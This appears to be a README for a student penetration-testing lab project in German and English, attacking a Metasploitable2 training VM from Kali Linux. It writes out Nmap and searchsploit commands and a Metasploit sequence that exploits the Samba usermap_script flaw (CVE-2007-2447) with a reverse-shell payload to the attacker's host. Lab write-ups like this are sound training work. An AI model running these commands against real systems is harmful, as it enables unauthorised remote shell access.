
Hands-on pentest project using Kali Linux vs Metasploitable2. Includes full workflow: Nmap scanning, enumeration, Metasploit exploitation (Samba CVE-2007-2447), post-exploitation validation, and mitigation steps. Repo contains commands, outputs, and report showing both offensive techniques and defensive recommendations.
Praktikumsprojekt 2 — Penetrationstests auf Metasploitable2
Zusammenfassung: Dieses Projekt zeigt einen vollständigen Penetrationstest-Workflow: Aufklärung, Enumeration, Exploitation, Post-Exploitation-Validierung und Empfehlungen zur Schadensbegrenzung. Das verwendete Ziel ist Metasploitable2 und die Angriffsbox ist Kali Linux.
Werkzeuge: Kali Linux (Angreifer) Nmap (Aufklärung) Metasploit Framework (Exploitation) SearchSploit / Exploit-DB (Sichtung)
Durchgeführte Schritte:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
Identifizierte Dienste (Beispiele): vsftpd 2.3.4 (Port 21 Banner), Samba smbd 3.x (Port 445).searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
Dienste mit potenziellen Exploits abgeglichen (vsftpd Backdoor, Samba username-map).msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
Interaktive Shell erhalten und Benutzerkontext validiert.id uname -aErgebnis Erfolgreich eine Remote-Shell über einen Samba-Exploit erhalten, den Angriffspfad dokumentiert und einen Maßnahmenplan erstellt. Vollständige Logs und Befehlsausgaben befinden sich im Ordner scans/.